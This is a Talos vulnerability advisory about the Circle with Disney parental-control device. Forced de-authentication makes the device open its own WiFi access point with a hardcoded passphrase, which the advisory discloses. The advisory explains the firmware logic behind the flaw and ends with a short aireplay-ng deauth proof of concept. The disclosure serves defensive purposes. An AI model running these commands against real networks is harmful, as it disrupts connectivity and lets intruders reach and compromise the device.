Talos Vulnerability Report


Circle with Disney WiFi Insecure Access Point Vulnerability

April 4, 2018
CVE Number



An exploitable vulnerability exists in the WiFi Access Point feature of Circle with Disney running firmware 2.0.1. A series of WiFi packets can force Circle to setup an Access Point with default credentials. An attacker needs to send a series of spoofed “de-auth” packets to trigger this vulnerability.

Tested Versions

Circle with Disney 2.0.1

Product URLs


CVSSv3 Score

6.5 - CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H


CWE-284: Improper Access Control


Circle with Disney is a network device used to monitor internet use of children on a given network.

Circle can connect to a home network either via WiFi or wired connection. When no cable connection is possible, Circle will switch to WiFi, which was set-up during the initial configuration.

When connected via WiFi, the main function in the configd binary continuously checks for network connectivity by calling sub_40A55C. This function verifies that the interface is associated with the Access Point and that it has an IP address assigned. If any of these checks aren’t satisfied, the return value will be 0, meaning there’s no available connection.

Back in the main function, when there’s no connection, function sub_40A2A0 will be called with argument “Internet connection down”. At high level, the function works as follows:

def circle_ap(status):
    print "setting Wifi Status to %s" % status
    if status == "paired":
        system("circle_ap.sh down 30 &")
        system("circle_ap.sh up &")                # [1]

At [1] the circle_ap.sh script is called to start an Access Point. Contents of the script are the following:


case $# in
        sleep $2

case "$1" in
        ps | grep [h]ostapd && ifconfig ra0 | grep UP &&  exit 0
        killall hostapd;
        ifconfig eth0
        ifconfig ra0 netmask up
        hostapd -B /tmp/hostapd.conf                              # [2]
        $CIRCLE_ROOT/scripts/refresh_hosts.sh ap
        killall hostapd;
        ifconfig ra0 netmask down;
        echo -n "usage: circle_ap <up/down> <optional delay>"
        exit 1

exit 0

At [2] hostapd is used to bring up an Access Point using the configuration below.

# grep -e ssid -e wpa /tmp/hostapd.conf
wpa_pairwise=TKIP CCMP

The SSID used is “Circle-“ prefixed with the last two hex digits of the MAC address. The “wpa_passphrase” parameter is fixed.

Indeed, the base hostapd.conf file is copied from /mnt/shares/usr/bin/scripts/hostapd.conf during boot time by the script startcircle. The only modification applied is the SSID name.

This feature allows an attacker to connect to a Circle Access Point, after forcing it out of its legitimate WiFi network. The device will continue to function but won’t be able to apply any filtering over the original network, moreover this allows an attacker to conduct further attacks against the device that may be possible only on a common subnetwork.

As an example, this vulnerability would allow an external attacker to apply TALOS-2017-0396 and TALOS-2017-0371 to completely compromise the device.

Exploit Proof-of-Concept

The following proof of concept shows how to make the device disconnect from its legitimate WiFi network and to start its own Access Point, by sending a series of “deauth” packets.

$ airmon-ng start wlan0 1
$ aireplay-ng --deauth 10000 -a $WIFI_ROUTER_MAC -c $CIRCLE_MAC mon0

After a new Access Point is detected with name starting with “Circle-“ it’s possible to connect to it using the password “mycircle”.


2017-09-20 - Vendor Disclosure
2018-03-29 - Public Release


Discovered by Claudio Bozzato and Lilith Wyatt of Cisco Talos.